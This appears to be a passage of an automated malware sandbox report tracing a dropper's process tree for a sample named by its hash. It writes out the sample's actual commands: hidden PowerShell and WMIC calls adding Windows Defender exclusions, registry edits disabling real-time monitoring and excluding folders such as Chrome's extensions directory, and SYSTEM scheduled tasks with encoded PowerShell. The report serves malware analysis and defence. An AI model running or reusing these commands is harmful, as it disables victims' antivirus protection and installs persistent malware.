WMIC.exe Token: SeManageVolumePrivilege 1320 WMIC.exe Token: SeDebugPrivilege 2068 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1152 WMIC.exe Token: SeIncreaseQuotaPrivilege 1152 WMIC.exe Token: SeSecurityPrivilege 1152 WMIC.exe Token: SeTakeOwnershipPrivilege 1152 WMIC.exe Token: SeLoadDriverPrivilege 1152 WMIC.exe Token: SeSystemtimePrivilege 1152 WMIC.exe Token: SeBackupPrivilege 1152 WMIC.exe Token: SeRestorePrivilege 1152 WMIC.exe Token: SeShutdownPrivilege 1152 WMIC.exe Token: SeSystemEnvironmentPrivilege 1152 WMIC.exe Token: SeUndockPrivilege 1152 WMIC.exe Token: SeManageVolumePrivilege 1152 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2848 wrote to memory of 3004 2848 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe 28 PID 2848 wrote to memory of 3004 2848 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe 28 PID 2848 wrote to memory of 3004 2848 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe 28 PID 2848 wrote to memory of 3004 2848 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe 28 PID 2848 wrote to memory of 3004 2848 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe 28 PID 2848 wrote to memory of 3004 2848 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe 28 PID 2848 wrote to memory of 3004 2848 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe 28 PID 3004 wrote to memory of 2144 3004 Install.exe 29 PID 3004 wrote to memory of 2144 3004 Install.exe 29 PID 3004 wrote to memory of 2144 3004 Install.exe 29 PID 3004 wrote to memory of 2144 3004 Install.exe 29 PID 3004 wrote to memory of 2144 3004 Install.exe 29 PID 3004 wrote to memory of 2144 3004 Install.exe 29 PID 3004 wrote to memory of 2144 3004 Install.exe 29 PID 2144 wrote to memory of 2532 2144 Install.exe 31 PID 2144 wrote to memory of 2532 2144 Install.exe 31 PID 2144 wrote to memory of 2532 2144 Install.exe 31 PID 2144 wrote to memory of 2532 2144 Install.exe 31 PID 2144 wrote to memory of 2532 2144 Install.exe 31 PID 2144 wrote to memory of 2532 2144 Install.exe 31 PID 2144 wrote to memory of 2532 2144 Install.exe 31 PID 2532 wrote to memory of 2808 2532 forfiles.exe 33 PID 2532 wrote to memory of 2808 2532 forfiles.exe 33 PID 2532 wrote to memory of 2808 2532 forfiles.exe 33 PID 2532 wrote to memory of 2808 2532 forfiles.exe 33 PID 2532 wrote to memory of 2808 2532 forfiles.exe 33 PID 2532 wrote to memory of 2808 2532 forfiles.exe 33 PID 2532 wrote to memory of 2808 2532 forfiles.exe 33 PID 2808 wrote to memory of 2788 2808 cmd.exe 34 PID 2808 wrote to memory of 2788 2808 cmd.exe 34 PID 2808 wrote to memory of 2788 2808 cmd.exe 34 PID 2808 wrote to memory of 2788 2808 cmd.exe 34 PID 2808 wrote to memory of 2788 2808 cmd.exe 34 PID 2808 wrote to memory of 2788 2808 cmd.exe 34 PID 2808 wrote to memory of 2788 2808 cmd.exe 34 PID 2788 wrote to memory of 2756 2788 powershell.exe 35 PID 2788 wrote to memory of 2756 2788 powershell.exe 35 PID 2788 wrote to memory of 2756 2788 powershell.exe 35 PID 2788 wrote to memory of 2756 2788 powershell.exe 35 PID 2788 wrote to memory of 2756 2788 powershell.exe 35 PID 2788 wrote to memory of 2756 2788 powershell.exe 35 PID 2788 wrote to memory of 2756 2788 powershell.exe 35 PID 2144 wrote to memory of 2600 2144 Install.exe 36 PID 2144 wrote to memory of 2600 2144 Install.exe 36 PID 2144 wrote to memory of 2600 2144 Install.exe 36 PID 2144 wrote to memory of 2600 2144 Install.exe 36 PID 2144 wrote to memory of 2600 2144 Install.exe 36 PID 2144 wrote to memory of 2600 2144 Install.exe 36 PID 2144 wrote to memory of 2600 2144 Install.exe 36 PID 2028 wrote to memory of 2472 2028 taskeng.exe 41 PID 2028 wrote to memory of 2472 2028 taskeng.exe 41 PID 2028 wrote to memory of 2472 2028 taskeng.exe 41 PID 2028 wrote to memory of 2472 2028 taskeng.exe 41 PID 2472 wrote to memory of 1284 2472 tgOgpoU.exe 42 PID 2472 wrote to memory of 1284 2472 tgOgpoU.exe 42 PID 2472 wrote to memory of 1284 2472 tgOgpoU.exe 42 PID 2472 wrote to memory of 1284 2472 tgOgpoU.exe 42 PID 2472 wrote to memory of 1264 2472 tgOgpoU.exe 44 PID 2472 wrote to memory of 1264 2472 tgOgpoU.exe 44 PID 2472 wrote to memory of 1264 2472 tgOgpoU.exe 44 PID 2472 wrote to memory of 1264 2472 tgOgpoU.exe 44 PID 340 wrote to memory of 2256 340 taskeng.exe 47 PID 340 wrote to memory of 2256 340 taskeng.exe 47 PID 340 wrote to memory of 2256 340 taskeng.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe"C:\Users\Admin\AppData\Local\Temp\57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Users\Admin\AppData\Local\Temp\7zS194B.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Users\Admin\AppData\Local\Temp\7zS1B2E.tmp\Install.exe.\Install.exe /FvdidQpG "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bmQWCxleEgxbTUrSZz" /SC once /ST 22:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo\lWMApHnNtvIHqRb\tgOgpoU.exe\" xv /vSmdidC 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2600
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 5804⤵
- Loads dropped DLL
- Program crash
PID:316
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8B9E9C08-D96E-47CC-B332-90ED665C187E} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo\lWMApHnNtvIHqRb\tgOgpoU.exeC:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo\lWMApHnNtvIHqRb\tgOgpoU.exe xv /vSmdidC 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCfUWcXkf" /SC once /ST 18:33:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:1284
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gCfUWcXkf"3⤵PID:1264
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gCfUWcXkf"3⤵PID:1816
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:328
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:2168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1996
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1984
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRcGeUXaa" /SC once /ST 08:33:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:1516
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRcGeUXaa"3⤵PID:1316
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRcGeUXaa"3⤵PID:1820
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:1664
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:1580
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:323⤵PID:1240
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:643⤵PID:664
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:3024
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:323⤵PID:2692
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:324⤵PID:2540
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:643⤵PID:2536
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:644⤵PID:2576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\ruCXiJvmKkuTmmIt\nBppcpdZ\ahHQenwSVcyoUFLD.wsf"3⤵PID:2684
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\ruCXiJvmKkuTmmIt\nBppcpdZ\ahHQenwSVcyoUFLD.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2572 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NonltQQlyMoZtVVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NonltQQlyMoZtVVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:324⤵PID:2156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:644⤵PID:2256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:324⤵PID:540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:644⤵PID:324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:324⤵PID:1104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:644⤵PID:1708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:324⤵PID:2888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:644⤵PID:2296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:324⤵PID:2496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:644⤵PID:1964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NonltQQlyMoZtVVB" /t REG_DWORD /d 0 /reg:324⤵PID:1080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NonltQQlyMoZtVVB" /t REG_DWORD /d 0 /reg:644⤵PID:1516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:1772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:1072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo" /t REG_DWORD /d 0 /reg:324⤵PID:692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo" /t REG_DWORD /d 0 /reg:644⤵PID:768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:324⤵PID:1376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:644⤵PID:1756
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCvobxAkx" /SC once /ST 21:35:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2608
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gCvobxAkx"3⤵PID:2976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gCvobxAkx"3⤵PID:2796
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2692
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2536
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2684
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nsbPTSdSgPuDRRbhc" /SC once /ST 07:45:31 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ruCXiJvmKkuTmmIt\lexazqZPNEWTjjp\JyKDiOp.exe\" X4 /IjKedidJV 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2568
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "nsbPTSdSgPuDRRbhc"3⤵PID:2632
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 4723⤵
- Loads dropped DLL
- Program crash
PID:2116
-
-
-
C:\Windows\Temp\ruCXiJvmKkuTmmIt\lexazqZPNEWTjjp\JyKDiOp.exeC:\Windows\Temp\ruCXiJvmKkuTmmIt\lexazqZPNEWTjjp\JyKDiOp.exe X4 /IjKedidJV 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2228 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bmQWCxleEgxbTUrSZz"3⤵PID:1004
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:1292
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:556
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:1720
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
